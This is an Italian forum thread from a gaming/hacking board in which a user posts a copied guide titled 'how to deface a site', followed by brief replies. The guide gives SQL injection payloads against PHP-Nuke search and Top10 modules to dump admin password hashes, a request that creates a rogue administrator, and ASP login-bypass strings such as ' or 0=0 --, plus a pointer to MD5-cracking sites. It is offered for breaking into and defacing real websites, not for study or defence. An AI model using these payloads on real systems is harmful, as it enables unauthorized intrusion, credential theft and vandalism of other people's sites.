Vuoi reagire a questo messaggio? Crea un account in pochi click o accedi per continuare.


Tutto quello che riguarda i giochi online ma soprattutto War Rock!
 
IndiceRetailFamasFREEUltime immaginiRegistratiAccedi
Benvenuto Su WarHax!

 

 Come defacciare un sito

Andare in basso 
2 partecipanti
AutoreMessaggio
bravo123
Utente
Utente



Messaggi : 33
Data d'iscrizione : 20.07.10

Come defacciare un sito Empty
MessaggioTitolo: Come defacciare un sito   Come defacciare un sito Icon_minitimeDom Lug 25, 2010 11:54 am


Salve,posto una guida su come defacciare i seguenti portali:
PHP Site
PHP-Nuke Site
ASP Site
PHPBB
PHPBB2 Forum
JPortal
GuestBook
Invision PowerBoard
Powered by FrontPage
_____________________|

________________________________________|
PHP-Nuke Site
Ora vi illustro 3 exploit moderni e funzionanti;

Exploit – Modulo Cerca

Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.

Exploit – Top10

Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit: [Devi essere iscritto e connesso per vedere questo link]
%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.

Exploit – Sql Injection

Scriviamo nella barra degli indirizzi la stringa: [Devi essere iscritto e connesso per vedere questo link]
Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro.

Con la stringa [Devi essere iscritto e connesso per vedere questo link] si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass
___________________________|
ASP Site
In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root

Diventare Utenti senza Neanche registrarsi:

UserName: apostrofo
Password: [nessuna password, lasciate vuoto]

Accedere da Admin:

UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’—
Password: [nessuna password]

Diventare automaticamente amministratori

UserName: admin’ –
Password: [nessuna pass]

Primo utente nella lista

UserName: ‘ or 0=0 –sp_password
Password: [nessuna pass]
_________________________________|
____|Qualke sito per decriptare psw in md5|_____
[Devi essere iscritto e connesso per vedere questo link]

Guida by : Web
spero di esservi stato utile bye
Scusate ma non entravano gli altri deface
Torna in alto Andare in basso
Admin
Founder
Founder



Messaggi : 261
Data d'iscrizione : 15.07.10
Località : Torino

Come defacciare un sito Empty
MessaggioTitolo: Re: Come defacciare un sito   Come defacciare un sito Icon_minitimeLun Lug 26, 2010 11:32 am

Bella guida Smile
Torna in alto Andare in basso
https://warhax.forumattivo.com
bravo123
Utente
Utente



Messaggi : 33
Data d'iscrizione : 20.07.10

Come defacciare un sito Empty
MessaggioTitolo: Re: Come defacciare un sito   Come defacciare un sito Icon_minitimeLun Lug 26, 2010 11:48 pm

grz ma nn e mia e io nn ci ho cpt quasi nnt pensavo fosse interesante x voi e lo postata ti sarei gratos e mi spieghi cosa e e a csoa serve
Torna in alto Andare in basso
Contenuto sponsorizzato





Come defacciare un sito Empty
MessaggioTitolo: Re: Come defacciare un sito   Come defacciare un sito Icon_minitime

Torna in alto Andare in basso
 
Come defacciare un sito
Torna in alto 
Pagina 1 di 1
 Argomenti simili
-
» Nuove icone per il sito

Permessi in questa sezione del forum:Non puoi rispondere agli argomenti in questo forum.
 :: Hacking-
Vai verso: